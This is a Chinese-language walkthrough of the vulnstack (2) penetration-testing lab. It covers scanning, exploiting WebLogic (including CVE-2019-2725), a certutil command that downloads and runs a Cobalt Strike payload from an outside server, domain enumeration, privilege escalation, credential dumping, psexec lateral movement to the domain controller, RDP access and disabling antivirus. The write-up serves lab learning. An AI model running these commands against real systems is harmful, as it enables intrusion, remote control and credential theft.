环境搭建
环境其实和vulnstack (一)差不多滴,只是变成有两台主机是具有两个IP的了。所有账号登录密码为1qaz@WSX,域管理员账号为administrator,密码和前面的一样。
Web:192.168.145.144(外),192.168.215.31(内)
PC:192.168.145.143(外),192.168.215.30(内)
DC:192.168.215.29(内)
Web主机添加一张网卡,网卡1选择NAT模式,网卡2选择LAN区段,LAN区段选择215网段即可。
本地连接1选择自动获取IP即可。
本地连接2配置如下。
PC主机也是和Web服务器一样的操作,本地连接1自动获取IP,本地连接2配置如下。
DC主机就一张网卡,选择LAN区段。本地连接如下。
最后在Web主机找到startWbLogic这个文件。
以管理员运行即可。
信息收集
nmap扫描一下网段,有143和144两台主机。
nmap -sP 192.168.145.*
对143主机进行端口扫描,135端口开放可能存在Smb爆破,445端口开放可能存在ms17_010。
nmap -sT -T4 -sV -O -sC -p1-65535 192.168.145.143
对144主机进行端口扫描,多开启了个80端口和7001端口。
nmap -sT -T4 -sV -O -sC -p1-65535 192.168.145.144
访问网站看看,啥也没有。
扫一下网站目录,没发现有用的东西。
dirsearch -u http://192.168.145.144/
这是我想到144还开启了7001端口,而7001是weblogic服务的默认端口,直接加上端口再扫一下网站的目录。
getshell
CS上线
这次就有东西了,访问发现是一个Weblogic server网站后台。我试了试爆破,发现爆破不出来。直接利用Weblogic漏洞检测工具跑一下,还真有漏洞。
可以直接执行命令,相当于拿了一半的shell。
既然能命令执行,那么我该咋办呢。我一开始是想着写入一句话木马,但是当前目录下不是网站目录,你连接不了你的木马。其实可以CS生成一个后门放到服务器上面,然后再执行命令下载允许不就行了吗。生成后门我就不说了,直接执行命令下载到144主机上面。
certutil.exe -urlcache -split -f http://8.149.xxxx.xxxx:80/1111.exe 1111.exe
接着是执行它,便会上线CS。
start /b 1111.exe
MSF上线
其实这台主机的weblogic server的漏洞还是挺多的,但是上面的这个工具只能一个一个的去测试。
用下面这个脚本可以批量测试漏洞,但是它只能测2019之前的漏洞,2019之后的就测不了,上面工具可以。
下载地址:https://github.com/dr0op/WeblogicScan.git
python WeblogicScan.py 192.168.145.144 7001
不过在MSF中好像只有这个CVE-2019-2725可以利用,其它的漏洞都没有发现利用方式。
直接使用这个模块,设置好参数直接run。
成功获取meterpreter。
域内渗透
域内信息收集
判断是否存在域,返回如下说明存在一个名为de1ay.com的域。
net time /domain
现在进一步对域内的主机信息进行收集,可以用CS插件也可以用命令,查看域控主机名称。
ping一下域控名称,我们就知道域控的IP了。
ping DC.de1ay.com
查看域内用户。
net user /domain
查看域内的其它主机,可以看到还有一台PC主机。
net group "domain computers" /domain # 查看域中的其他主机名
既然存在内网,那么我们进行一下端口探测。注意这里要先提权一下,直接用CS的插件进行MS14-058提权即可。先扫内网215网段,扫一下重要端口即可。
可以看到还存在30,29两台主机,31是我们的web服务器。从前面ping的域控名称可以知道,29是我们的域控,那么30就是我们的PC主机了,而且都开启了135,445端口。
再扫一下外网145网段。
可以看到还存在一台IP为143的主机,结合前面的信息我们可以判断是它是PC主机,也就是说PC主机是有两个网段的。
DC上线CS
既然都开启了135,445端口那么我们来尝试一下smb横移看看,先抓取密码。
创建smb监听器。
在目标列表右键29主机,选择psexec64。选择我们刚刚抓取的密码,监听器选择刚刚创建的smb监听器。
成功上线CS。
PC上线CS
接着是PC的上线,我试了试smb横移发现行,不太清楚为啥。
然后我用MSF使用第三个模块,扫了一下MS17_010漏洞。
发现有MS17_010漏洞。
利用攻击模块试试,但是没有成功,因为上面搜出来的0和1模块攻击对象都是x64的,而我们的PC是x86的。
使用2模块通过漏洞执行的,也不行,估计是PC上有安全软件啥的。
既然有安全软件,那么IPC连接传后门过去也不可能了,实际上IPC连接后没权限传递后门过去,不清楚为啥。前面我们还扫出143主机开放3389端口,我们可以试试远程桌面连接。用户名和密码就是我们刚刚抓取到的。
这里还是有些问题没搞懂,我远程连接之后登录de1ay/mssql,1qaz@WSX这个账号密码说我没权限啥的。
然后我用这个mssql ,1qaz@WSX也不行。其实到这里我有点蒙了,最后我又试试de1ay,1qaz@WSX这个账号密码,发现可以。
登录上去之后关掉360防护,那想干啥都行了。
总结
整体不算难的靶机,就是有些细节可能出了问题。比如smb横移不过去,远程桌面连接账号问题。
最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。